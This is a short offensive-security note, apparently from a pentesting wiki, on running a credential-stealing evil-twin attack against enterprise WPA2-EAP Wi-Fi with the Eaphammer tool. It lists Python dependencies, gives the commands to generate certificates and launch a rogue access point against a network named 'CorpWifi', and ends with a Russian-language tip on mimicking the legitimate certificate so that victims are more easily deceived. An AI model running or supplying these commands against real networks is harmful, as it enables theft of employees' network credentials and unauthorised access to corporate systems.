Enterprise

Evil Twin

Eaphammer

Firstly install requirements with venv !! python3.11 !!

bs4
pywebcopy
flask_socketio
flask_cors
flask
tqdm
pyOpenSSL
pem

To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
sudo ./eaphammer --essid CorpWifi --bssid 02:27:22:08:08:89 --interface wlan1 --creds

Import certificate

View installed certs

Dump original cert

Для более убедительной атаки сертификат, представляемый пользователям при аутентификации, должен быть похож на легитимный сертификат. Сертификат, используемый легитимной точкой доступа (AP), можно извлечь из захвата сети с помощью следующего инструмента: ссылка на скрипт.

Last updated